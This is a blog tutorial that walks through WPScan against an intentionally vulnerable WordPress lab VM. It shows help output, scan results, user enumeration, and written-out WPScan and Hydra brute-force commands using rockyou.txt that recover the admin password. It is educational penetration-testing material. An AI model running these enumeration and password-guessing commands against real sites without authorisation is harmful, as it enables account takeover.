WPScan: Deep Dive into WordPress Security

WPScan is a popular open-source web vulnerability scanner specifically created for WordPress. It's used by security professionals and website administrators to detect security weaknesses in WordPress installations, themes, and plugins.

Hello everyone. In today's article, I'll show you how WPScan can be used to scan and uncover vulnerabilities in WordPress.

Before we go through, ensure you have three prerequisites in place.

First, you'll need Kali Linux installed and running on a virtual machine. This virtual environment isolates your scanning activities and safeguards your main computer. Make sure the virtual machine's network adapter is configured in a special mode called "Host-only" to allow communication between Kali and your target website.

Next, you'll require a vulnerable WordPress website to scan.

For this tutorial, we'll be using a website called OWASP Broken Web Application, intentionally made vulnerable for educational use. This offers a secure environment to practice without impacting a real website. If you're unsure about obtaining and setting it up on VirtualBox, please watch this instructional video first. Ensure that the virtual machine's network adapter is configured as "Host-only" to enable communication between Kali Linux and your target website.

Next, we need a Steady Internet Connection. A stable internet connection is essential for the scanning process to communicate with the target website. First, ensure you have a reliable internet connection. This is crucial for the scanning process to interact with the target website. Access your Kali VM, navigate to settings, then to Network adapter, and confirm that the second adapter is connected to the NAT network.

Once you have the necessary prerequisites set up, you're ready to begin scanning for vulnerabilities on your target website.

Unlike other scenarios, you won't need to use the net discover command line tool to obtain the IP address. Here, on the OWASP Broken Web Application virtual machine, the IP address is readily visible.

To proceed, open your preferred browser in Kali Linux and navigate to this IP address. Here, Scroll down the page to locate a section labeled "OLD (vulnerable) versions of real applications," where you'll find WordPress listed.

Click on the WordPress link, and you'll be redirected to the Broken WordPress webpage.

Now that our target website is prepared, we can proceed with scanning it using the WPScan tool.

WPScan comes preinstalled with Kali Linux and can be accessed through the "Web Applications" menu, typically found under "Web Vulnerability Scanners."

Upon execution, WPScan will display a simple help menu.

$ wpscan --help

_______________________________________________________________

__ _______ _____

\ \ / / __ \ / ____|

\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®

\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \

\ /\ / | | ____) | (__| (_| | | | |

\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team

Version 3.8.25

@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

_______________________________________________________________

Usage: wpscan [options]

--url URL The URL of the blog to scan

Allowed Protocols: http, https

Default Protocol if none provided: http

This option is mandatory unless update or help or hh or version is/are supplied

-h, --help Display the simple help and exit

--hh Display the full help and exit

--version Display the version and exit

-v, --verbose Verbose mode

--[no-]banner Whether or not to display the banner

Default: true

-o, --output FILE Output to FILE

-f, --format FORMAT Output results in the format supplied

Available choices: cli-no-colour, cli-no-color, json, cli

--detection-mode MODE Default: mixed

Available choices: mixed, passive, aggressive

--user-agent, --ua VALUE

--random-user-agent, --rua Use a random user-agent for each scan

--http-auth login:password

-t, --max-threads VALUE The max threads to use

Default: 5

--throttle MilliSeconds Milliseconds to wait before doing another web request. If used, the max threads will be set to 1.

--request-timeout SECONDS The request timeout in seconds

Default: 60

--connect-timeout SECONDS The connection timeout in seconds

Default: 30

--disable-tls-checks Disables SSL/TLS certificate verification, and downgrade to TLS1.0+ (requires cURL 7.66 for the latter)

--proxy protocol://IP:port Supported protocols depend on the cURL installed

--proxy-auth login:password

--cookie-string COOKIE Cookie string to use in requests, format: cookie1=value1[; cookie2=value2]

--cookie-jar FILE-PATH File to read and write cookies

Default: /tmp/wpscan/cookie_jar.txt

--force Do not check if the target is running WordPress or returns a 403

--[no-]update Whether or not to update the Database

--api-token TOKEN The WPScan API Token to display vulnerability data, available at https://wpscan.com/profile

--wp-content-dir DIR The wp-content directory if custom or not detected, such as "wp-content"

--wp-plugins-dir DIR The plugins directory if custom or not detected, such as "wp-content/plugins"

-e, --enumerate [OPTS] Enumeration Process

Available Choices:

vp Vulnerable plugins

ap All plugins

p Popular plugins

vt Vulnerable themes

at All themes

t Popular themes

tt Timthumbs

cb Config backups

dbe Db exports

u User IDs range. e.g: u1-5

Range separator to use: '-'

Value if no argument supplied: 1-10

m Media IDs range. e.g m1-15

Note: Permalink setting must be set to "Plain" for those to be detected

Range separator to use: '-'

Value if no argument supplied: 1-100

Separator to use between the values: ','

Default: All Plugins, Config Backups

Value if no argument supplied: vp,vt,tt,cb,dbe,u,m

Incompatible choices (only one of each group/s can be used):

- vp, ap, p

- vt, at, t

--exclude-content-based REGEXP_OR_STRING Exclude all responses matching the Regexp (case insensitive) during parts of the enumeration.

Both the headers and body are checked. Regexp delimiters are not required.

--plugins-detection MODE Use the supplied mode to enumerate Plugins.

Default: passive

Available choices: mixed, passive, aggressive

--plugins-version-detection MODE Use the supplied mode to check plugins' versions.

Default: mixed

Available choices: mixed, passive, aggressive

--exclude-usernames REGEXP_OR_STRING Exclude usernames matching the Regexp/string (case insensitive). Regexp delimiters are not required.

-P, --passwords FILE-PATH List of passwords to use during the password attack.

If no --username/s option supplied, user enumeration will be run.

-U, --usernames LIST List of usernames to use during the password attack.

Examples: 'a1', 'a1,a2,a3', '/tmp/a.txt'

--multicall-max-passwords MAX_PWD Maximum number of passwords to send by request with XMLRPC multicall

Default: 500

--password-attack ATTACK Force the supplied attack to be used rather than automatically determining one.

Multicall will only work against WP < 4.4

Available choices: wp-login, xmlrpc, xmlrpc-multicall

--login-uri URI The URI of the login page if different from /wp-login.php

--stealthy Alias for --random-user-agent --detection-mode passive --plugins-version-detection passive

[!] To see full list of options use --hh.

┌──(kali㉿kali)-[~]

└─$

If you need more detailed instructions, you can use the command wpscan --hh, for the full help documentation.

┌──(kali㉿kali)-[~]

└─$ wpscan --hh

_______________________________________________________________

__ _______ _____

\ \ / / __ \ / ____|

\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®

\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \

\ /\ / | | ____) | (__| (_| | | | |

\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team

Version 3.8.25

@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

_______________________________________________________________

Usage: wpscan [options]

--url URL The URL of the blog to scan

Allowed Protocols: http, https

Default Protocol if none provided: http

This option is mandatory unless update or help or hh or version is/are supplied

-h, --help Display the simple help and exit

--hh Display the full help and exit

--version Display the version and exit

--ignore-main-redirect Ignore the main redirect (if any) and scan the target url

-v, --verbose Verbose mode

--[no-]banner Whether or not to display the banner

Default: true

--max-scan-duration SECONDS Abort the scan if it exceeds the time provided in seconds

-o, --output FILE Output to FILE

-f, --format FORMAT Output results in the format supplied

Available choices: cli-no-colour, cli-no-color, json, cli

--detection-mode MODE Default: mixed

Available choices: mixed, passive, aggressive

--scope DOMAINS Comma separated (sub-)domains to consider in scope.

Wildcard(s) allowed in the trd of valid domains, e.g: *.target.tld

Separator to use between the values: ','

--user-agent, --ua VALUE

--headers HEADERS Additional headers to append in requests

Separator to use between the headers: '; '

Examples: 'X-Forwarded-For: 127.0.0.1', 'X-Forwarded-For: 127.0.0.1; Another: aaa'

--vhost VALUE The virtual host (Host header) to use in requests

--random-user-agent, --rua Use a random user-agent for each scan

--user-agents-list FILE-PATH List of agents to use with --random-user-agent

Default: /usr/share/rubygems-integration/all/gems/cms_scanner-0.13.9/app/user_agents.txt

--http-auth login:password

-t, --max-threads VALUE The max threads to use

Default: 5

--throttle MilliSeconds Milliseconds to wait before doing another web request. If used, the max threads will be set to 1.

--request-timeout SECONDS The request timeout in seconds

Default: 60

--connect-timeout SECONDS The connection timeout in seconds

Default: 30

--disable-tls-checks Disables SSL/TLS certificate verification, and downgrade to TLS1.0+ (requires cURL 7.66 for the latter)

--proxy protocol://IP:port Supported protocols depend on the cURL installed

--proxy-auth login:password

--cookie-string COOKIE Cookie string to use in requests, format: cookie1=value1[; cookie2=value2]

--cookie-jar FILE-PATH File to read and write cookies

Default: /tmp/wpscan/cookie_jar.txt

--cache-ttl TIME_TO_LIVE The cache time to live in seconds

Default: 600

--clear-cache Clear the cache before the scan

--cache-dir PATH Default: /tmp/wpscan/cache

--server SERVER Force the supplied server module to be loaded

Available choices: apache, iis, nginx

--force Do not check if the target is running WordPress or returns a 403

--[no-]update Whether or not to update the Database

--api-token TOKEN The WPScan API Token to display vulnerability data, available at https://wpscan.com/profile

--wp-content-dir DIR The wp-content directory if custom or not detected, such as "wp-content"

--wp-plugins-dir DIR The plugins directory if custom or not detected, such as "wp-content/plugins"

--interesting-findings-detection MODE Use the supplied mode for the interesting findings detection.

Available choices: mixed, passive, aggressive

--wp-version-all Check all the version locations

--wp-version-detection MODE Use the supplied mode for the WordPress version detection, instead of the global (--detection-mode) mode.

Available choices: mixed, passive, aggressive

--main-theme-detection MODE Use the supplied mode for the Main theme detection, instead of the global (--detection-mode) mode.

Available choices: mixed, passive, aggressive

-e, --enumerate [OPTS] Enumeration Process

Available Choices:

vp Vulnerable plugins

ap All plugins

p Popular plugins

vt Vulnerable themes

at All themes

t Popular themes

tt Timthumbs

cb Config backups

dbe Db exports

u User IDs range. e.g: u1-5

Range separator to use: '-'

Value if no argument supplied: 1-10

m Media IDs range. e.g m1-15

Note: Permalink setting must be set to "Plain" for those to be detected

Range separator to use: '-'

Value if no argument supplied: 1-100

Separator to use between the values: ','

Default: All Plugins, Config Backups

Value if no argument supplied: vp,vt,tt,cb,dbe,u,m

Incompatible choices (only one of each group/s can be used):

- vp, ap, p

- vt, at, t

--exclude-content-based REGEXP_OR_STRING Exclude all responses matching the Regexp (case insensitive) during parts of the enumeration.

Both the headers and body are checked. Regexp delimiters are not required.

--plugins-list LIST List of plugins to enumerate

Examples: 'a1', 'a1,a2,a3', '/tmp/a.txt'

--plugins-detection MODE Use the supplied mode to enumerate Plugins.

Default: passive

Available choices: mixed, passive, aggressive

--plugins-version-all Check all the plugins version locations according to the choosen mode (--detection-mode, --plugins-detection and --plugins-version-detection)

--plugins-version-detection MODE Use the supplied mode to check plugins' versions.

Default: mixed

Available choices: mixed, passive, aggressive

--plugins-threshold THRESHOLD Raise an error when the number of detected plugins via known locations reaches the threshold. Set to 0 to ignore the threshold.

Default: 100

--themes-list LIST List of themes to enumerate

Examples: 'a1', 'a1,a2,a3', '/tmp/a.txt'

--themes-detection MODE Use the supplied mode to enumerate Themes, instead of the global (--detection-mode) mode.

Available choices: mixed, passive, aggressive

--themes-version-all Check all the themes version locations according to the choosen mode (--detection-mode, --themes-detection and --themes-version-detection)

--themes-version-detection MODE Use the supplied mode to check themes versions instead of the --detection-mode or --themes-detection modes.

Available choices: mixed, passive, aggressive

--themes-threshold THRESHOLD Raise an error when the number of detected themes via known locations reaches the threshold. Set to 0 to ignore the threshold.

Default: 20

--timthumbs-list FILE-PATH List of timthumbs' location to use

Default: /home/kali/.wpscan/db/timthumbs-v3.txt

--timthumbs-detection MODE Use the supplied mode to enumerate Timthumbs, instead of the global (--detection-mode) mode.

Available choices: mixed, passive, aggressive

--config-backups-list FILE-PATH List of config backups' filenames to use

Default: /home/kali/.wpscan/db/config_backups.txt

--config-backups-detection MODE Use the supplied mode to enumerate Config Backups, instead of the global (--detection-mode) mode.

Available choices: mixed, passive, aggressive

--db-exports-list FILE-PATH List of DB exports' paths to use

Default: /home/kali/.wpscan/db/db_exports.txt

--db-exports-detection MODE Use the supplied mode to enumerate DB Exports, instead of the global (--detection-mode) mode.

Available choices: mixed, passive, aggressive

--medias-detection MODE Use the supplied mode to enumerate Medias, instead of the global (--detection-mode) mode.

Available choices: mixed, passive, aggressive

--users-list LIST List of users to check during the users enumeration from the Login Error Messages

Examples: 'a1', 'a1,a2,a3', '/tmp/a.txt'

--users-detection MODE Use the supplied mode to enumerate Users, instead of the global (--detection-mode) mode.

Available choices: mixed, passive, aggressive

--exclude-usernames REGEXP_OR_STRING Exclude usernames matching the Regexp/string (case insensitive). Regexp delimiters are not required.

-P, --passwords FILE-PATH List of passwords to use during the password attack.

If no --username/s option supplied, user enumeration will be run.

-U, --usernames LIST List of usernames to use during the password attack.

Examples: 'a1', 'a1,a2,a3', '/tmp/a.txt'

--multicall-max-passwords MAX_PWD Maximum number of passwords to send by request with XMLRPC multicall

Default: 500

--password-attack ATTACK Force the supplied attack to be used rather than automatically determining one.

Multicall will only work against WP < 4.4

Available choices: wp-login, xmlrpc, xmlrpc-multicall

--login-uri URI The URI of the login page if different from /wp-login.php

--stealthy Alias for --random-user-agent --detection-mode passive --plugins-version-detection passive

┌──(kali㉿kali)-[~]

└─$

Now, let's proceed to scan the WordPress website to uncover details such as the WordPress version, theme information, plugin details, security-related headers, and more.

Open a new terminal window and enter the command `wpscan --url`, followed by the URL of the WordPress site you want to scan.

┌──(kali㉿kali)-[~]

└─$ wpscan --url http://192.168.56.105/wordpress/

_______________________________________________________________

__ _______ _____

\ \ / / __ \ / ____|

\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®

\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \

\ /\ / | | ____) | (__| (_| | | | |

\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team

Version 3.8.25

@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

_______________________________________________________________

[i] Updating the Database ...

[i] Update completed.

[+] URL: http://192.168.56.105/wordpress/ [192.168.56.105]

[+] Started: Fri Apr 12 12:56:41 2024

Interesting Finding(s):

[+] Headers

| Interesting Entries:

| - Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1

| - X-Powered-By: PHP/5.3.2-1ubuntu4.30

| - Status: 200 OK

| Found By: Headers (Passive Detection)

| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.105/wordpress/xmlrpc.php

| Found By: Headers (Passive Detection)

| Confidence: 60%

| Confirmed By: Link Tag (Passive Detection), 30% confidence

| References:

| - http://codex.wordpress.org/XML-RPC_Pingback_API

| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/

| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/

| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/

| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.105/wordpress/readme.html

| Found By: Direct Access (Aggressive Detection)

| Confidence: 100%

[+] WordPress version 2.0 identified (Insecure, released on 2005-12-26).

| Found By: Rss Generator (Passive Detection)

| - http://192.168.56.105/wordpress/?feed=rss2,

| - http://192.168.56.105/wordpress/?feed=rss2, <generator>http://wordpress.org/?v=2.0</generator>

[+] WordPress theme in use: default

| Location: http://192.168.56.105/wordpress/wp-content/themes/default/

| Last Updated: 2020-02-25T00:00:00.000Z

| [!] The version is out of date, the latest version is 1.7.2

| Style URL: http://192.168.56.105/wordpress/wp-content/themes/default/style.css

| Style Name: WordPress Default

| Style URI: http://wordpress.org/

| Description: The default WordPress theme based on the famous <a href="http://binarybonsai.com/kubrick/">Kubrick</...

| Author: Michael Heilemann

| Author URI: http://binarybonsai.com/

| Found By: Css Style In Homepage (Passive Detection)

| Confirmed By: Urls In Homepage (Passive Detection)

| Version: 1.5 (80% confidence)

| Found By: Style (Passive Detection)

| - http://192.168.56.105/wordpress/wp-content/themes/default/style.css, Match: 'Version: 1.5'

[+] Enumerating All Plugins (via Passive Methods)

[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mygallery

| Location: http://192.168.56.105/wordpress/wp-content/plugins/mygallery/

| Latest Version: 2.0.8

| Last Updated: 2019-10-22T14:01:00.000Z

| Found By: Urls In Homepage (Passive Detection)

| The version could not be determined.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)

Checking Config Backups - Time: 00:00:01 <=======================================================> (137 / 137) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.

[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Apr 12 12:57:01 2024

[+] Requests Done: 195

[+] Cached Requests: 6

[+] Data Sent: 43.611 KB

[+] Data Received: 21.134 MB

[+] Memory used: 251.094 MB

[+] Elapsed time: 00:00:19

┌──(kali㉿kali)-[~]

└─$

After scanning, WPScan will provide insights into the WordPress installation, revealing details like version numbers, theme information, and detected plugins, as well as whether XML-RPC functionality is enabled. The scan results may highlight potential security concerns, such as outdated software versions and the presence of exploitable features like XML-RPC, which could be targeted by attackers.

In another article, I'll demonstrate how an attacker can exploit these vulnerabilities.

WPScan offers various enumeration techniques that can be specified during execution. For a detailed view, let's enumerate WordPress themes. In the terminal, include the -e flag to specify enumeration and the at the flag to target "all themes".

┌──(kali㉿kali)-[~]

└─$ wpscan --url http://192.168.56.105/wordpress/ -e at

Additionally, you can use other flags like vt to specifically list vulnerable themes. The scan output reveals two outdated theme versions, "classic" and "default", which are potentially vulnerable to known security issues that could be exploited by attackers.

[i] Theme(s) Identified:

[+] classic
 | Location: http://192.168.56.105/wordpress/wp-content/themes/classic/
 | Last Updated: 2020-02-25T00:00:00.000Z
 | [!] The version is out of date, the latest version is 1.6
 | Style URL: http://192.168.56.105/wordpress/wp-content/themes/classic/style.css
 | Style Name: WordPress Classic
 | Style URI: http://wordpress.org/
 | Description: The original WordPress theme that graced versions 1.2.x and prior....
 | Author: Dave Shea
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.105/wordpress/wp-content/themes/classic/, status: 500
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.105/wordpress/wp-content/themes/classic/style.css, Match: 'Version: 1.5'

[+] default
 | Location: http://192.168.56.105/wordpress/wp-content/themes/default/
 | Last Updated: 2020-02-25T00:00:00.000Z
 | [!] The version is out of date, the latest version is 1.7.2
 | Style URL: http://192.168.56.105/wordpress/wp-content/themes/default/style.css
 | Style Name: WordPress Default
 | Style URI: http://wordpress.org/
 | Description: The default WordPress theme based on the famous <a href="http://binarybonsai.com/kubrick/">Kubrick</...
 | Author: Michael Heilemann
 | Author URI: http://binarybonsai.com/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.105/wordpress/wp-content/themes/default/, status: 500
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.105/wordpress/wp-content/themes/default/style.css, Match: 'Version: 1.5'

Now, let's enumerate the plugins installed within WordPress. To achieve this, we'll use the ap flag during the scanning process.

┌──(kali㉿kali)-[~]

└─$ wpscan --url http://192.168.56.105/wordpress/ -e ap

In the scan results, we have identified the my_gallery plugin with an unknown version.

[i] Plugin(s) Identified:

[+] mygallery
 | Location: http://192.168.56.105/wordpress/wp-content/plugins/mygallery/
 | Latest Version: 2.0.8
 | Last Updated: 2019-10-22T14:01:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | The version could not be determined.

The inability to determine the version of this plugin raises concerns, as it could potentially be outdated or vulnerable, posing a risk to the security of the WordPress installation.

WPScan can also be used to enumerate WordPress user accounts. To do this, we'll utilize the -u flag during the scan.

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://192.168.56.105/wordpress/ -e u 

During the scanning process, we discovered a user named "admin".

[i] User(s) Identified:

[+] admin

| Found By: Rss Generator (Passive Detection)

| Confirmed By: Login Error Messages (Aggressive Detection)

This information is critical as it reveals a potential target for attackers, who could leverage this knowledge for targeted attacks, such as brute-force attempts to crack the password associated with the "admin" account.

You can use WPScan for a brute-force attack on WordPress user accounts. In the terminal, use the -U flag followed by the username, and then use the -P flag to specify a wordlist. For this purpose, I will use “rockyou.txt”.

Once the wordlist is ready, specify it after the -P flag in the WPScan command. The process may take considerable time, depending on the size of the wordlist and the availability of matching passwords.

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://192.168.56.105/wordpress/ -U admin -P /usr/share/wordlists/rockyou.txt 

The WPScan brute-force attempt yields no results.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)

Checking Config Backups - Time: 00:00:01 <=======================================================> (137 / 137) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s

Error: Unknown response received Code: 302

^Cying admin / 201988 Time: 00:50:14 < > (32947 / 14344392) 0.22% ETA: ??:??:??

[i] No Valid Passwords Found.

> (32954 / 14344392) 0.22% ETA: ??:??:??

But, don't worry. You can try another tool like Hydra for performing brute-force attacks more effectively. Hydra is a versatile tool specifically designed for password-cracking tasks and can be used for various protocols and services beyond WordPress.

To use Hydra effectively, we first need to capture some data like login parameters and response phases. We can accomplish this using Burp Suite.

On the browser, visit the WordPress "WP-admin" login page in your web browser.

This page is the default login portal for WordPress. Now, let’s intercept the data while visiting this page. To do this, launch Burp Suite from the Kali Linux menu.

Adjust the proxy settings in Burp Suite to capture the necessary data. Unfortunately, due to time constraints, I won't be able to go through this step.

To start, switch the proxy tab in Burp Suite to capture the necessary data. Set the intercept mode to "on" and click on, open a browser.

Visit the WP-admin page of WordPress, and forward the intercept data to capture the login form. Enter a username and password to generate the intercept data we need.

Next, copy this intercepted data into a text editor to craft a Hydra command.

Let's create and execute the Hydra command in the terminal.

┌──(kali㉿kali)-[~]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.56.105 http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&submit=Login+%C2%BB&redirect_to=%2Fwordpress%2Fwp-admin%2F:Incorrect password"

Upon execution, I discovered that the password for the username "admin" is also "admin".

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-12 14:44:05

[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344400 login tries (l:1/p:14344400), ~896525 tries per task

[DATA] attacking http-post-form://192.168.56.105:80/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&submit=Login+%C2%BB&redirect_to=%2Fwordpress%2Fwp-admin%2F:Incorrect password

[80][http-post-form] host: 192.168.56.105 login: admin password: admin

1 of 1 target successfully completed, 1 valid password found

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-12 14:44:15

┌──(kali㉿kali)-[~]

└─$

Now, let's use these credentials to log in. We're now inside the WordPress dashboard, which might appear outdated.

From here, we can make modifications as desired. This is all, that covers the basic usage of the WPScan command-line tool. There are additional functionalities and uses that we'll explore in another video.

If you have any questions or doubts about the content of this video, feel free to leave them in the comments section below. I'll be happy to address them.

WPScan: Deep Dive into WordPress Security

Post a Comment

Social Plugin

Popular Posts

ANDRAX: The Cracker Technology

Bypassing Web Application Firewall using Tamper Script via SQLMap

Kali NetHunter Lite: Install on Any rooted Android Device

Labels

Most Recent

Comments

About Us

Follow Us

Footer Copyright

#buttons=(Ok, Go it!) #days=(20)

Contact form

WPScan: Deep Dive into WordPress Security

You may like these posts

Post a Comment

#buttons=(Ok, Go it!) #days=(20)

Contact form